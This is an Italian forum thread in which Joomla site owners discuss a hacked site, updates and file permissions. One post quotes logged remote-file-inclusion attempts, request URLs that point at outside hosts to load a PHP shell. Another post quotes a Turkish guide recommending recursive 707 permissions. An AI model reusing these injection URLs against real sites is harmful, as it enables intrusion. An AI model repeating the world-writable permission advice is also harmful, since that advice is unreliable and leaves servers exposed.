colpito e affondato: in meno di 12 ore due attacchi al sito

[tasto]

Adesso mi tocca cancellare tutto. Mi hanno canbiato la pass per accedere all'administrator
avevo installato anche dei mambot, ma niente
Bisogna fare un post con tutti i consigli da dare agli utenti per creare una minima barriera contro questi "stupidini"

[cos]

"stupidini"

Spupidini   ..........

Sono dei veri delinquenti io li equiparo a degli scassinatori

e come se qualcuno mi entrasse in casa

cribbio !!

che versione hai

[tasto]

Stupidini... per non scrivere un'altra parola 
1.0.12

[Maorinz]

La discussione mi interessa.

Molte volte leggo di tentativi più o meno riusciti di hackeraggio.....
A mio parere manca una guida che serva a mettersi al riparo almeno dai tentativi più comuni, partendo proprio dai punti base tipo: come formulare le pwd, o altro.
Penso chea sarebbe utile a molti come me...
Chiaro che se l'intento è di entrarci lo fanno comunque, ma se invece di usare una comune chiave devono invece preoccuparsi dell'allarme, dei cani, e la porta invece che di compensato la trovano blindata.....
Ciao!

[Luca Curatola]

Da quando mi amministro il server non ho piu' avuto problemi

[carlo_gra]

Stupidini... per non scrivere un'altra parola 
1.0.12

COnviene che una volta ripristinato il ripristinabile fai un aggiornamento alla 1.0.13...

[.Andrea S.]

..........
Bisogna fare un post con tutti i consigli da dare agli utenti
..........

come avevi impostato i permessi di cartelle e file?

[surfbit]

Sottolineo l'intervento di Maori_nz non sarebbe male una guida proprio partendo dalle non belle esperienze di tutti.
Una sezione che rigurda la sicurezza c'è ma in inglese:

http://forum.joomla.org/index.php?board=267.0

[tasto]

nel sito ho facileform, docman, newsflash ajax ci sono problemi se installo la .13?

[.Andrea S.]

..........
Bisogna fare un post con tutti i consigli da dare agli utenti
..........

come avevi impostato i permessi di cartelle e file?

[tasto]

755

Tramite google analytics ho trovato la fonte di origine delle visite al mio sito... sono turchi e nel loro sito ho trovato questo

Standart Joomla Güvenlik - İdeal Chmod Ayarları! - 05-08-2007, 01:10 AM

JOOMLA KURULDUKTAN SONRA YAPMANIZ GEREKEN
dogru chmod ayarlarini gosterir
klasor ve klasor icindeki dosyalalarin tamaminin chmod ayarini yapan
FTP PROGRAMI KULLANMALISINIZ
belli ftp programlari sadece klasoru 755 yaparsa icindeki dosyalarin chmod u degismez
genelde flashxfp de bu ozellik var
ftp programiniz bunu yapamiyorsa
klasoru acip icindeki tum dosyalari secip
chmod larini ornegin 755 yapmaniz gerekli
alttaki verilen degerleri klasor ve dosyalariniza MUHAKKAK UGULARSANIZ
gece mi$il Mi$il uyuyabilirsiniz !! yoksa siteniz yol gecen hanina doner !
change the permissions of the
images/,
media/,
uploadfiles/
administrator/backups .... directories to 707, this should be done recursively:
chmod -R 707 images
chmod -R 707 media
chmod -R 707 uploadfiles
chmod -R 707 components
chmod -R 707 languages
chmod -R 707 modules
chmod -R 707 templates
chmod -R 707 administrator/backups
chmod -R 707 administrator/components
chmod 744 configuration.php

[.Andrea S.]

Se avevi il 755 anche per i file (sopratutto configuration) il problema è quello.

[flavio b.]

per condividere la mia esperienza,
in data odierna mi è capitato di registrare le seguenti "intrusioni"(ne avevo già parlato in altro post: gli IP utilizzano il noto Browser Lynx e quei percorsi che vedete forse  sono un percorso per includere una shell in php e prendere possesso della macchina...
 
questi tentativi sono stati effettuati stamani:

Codice: [Seleziona]

http://www.miosito.com/index.php?site=http://abc.someshit.ru/c.ar??
http://www.miosito.com/index.php?loca=http://usuarios.arnet.com.ar/larry123/safe.txt?
http://www.miosito.com/index.php?loca=http://usuarios.arnet.com.ar/larry123/safe.txt?

tutto questo fatto da ragazzini che sanno lanciare un eseguibile e scrivere un url, spacciandosi per hacker e fare i bulletti con gli amici senza pensare che ci sono persone che a causa loro perdono tempo e denaro.

[tasto]

cme devono essere settati i permessi?

[.Andrea S.]

755 dir e 644 file

[.Andrea S.]

per condividere la mia esperienza,
........

Ma questi sono tentativi che abbiamo tutti, spider che vanno alla ricerca di gente che lascia la "porta aperta".
Certo che se lasci la porta aperta e poi ti lamenti che sono venuti i ladri... 

[tasto]

domanda forse stupida... se nella configurazione del sito spunto la casella per rendere "non scrivibile il file"? risolvo qualcosa?

[zizou2]

755 dir e 644 file

cioè tutte le cartelle a 755?

e i file nella root a 644?

ho capito bene?

scusa ma sono ancora molto inesperto

ciao

[zizou2]

è possibile che il mio sito sia settato tutto su 644 e funzioni perfettamente almeno fino ad ora?

[flavio b.]

per condividere la mia esperienza,
........

Ma questi sono tentativi che abbiamo tutti, spider che vanno alla ricerca di gente che lascia la "porta aperta".
Certo che se lasci la porta aperta e poi ti lamenti che sono venuti i ladri... 

Quindi non mi devo preoccupare di questi spider?
significa che non sono entrati?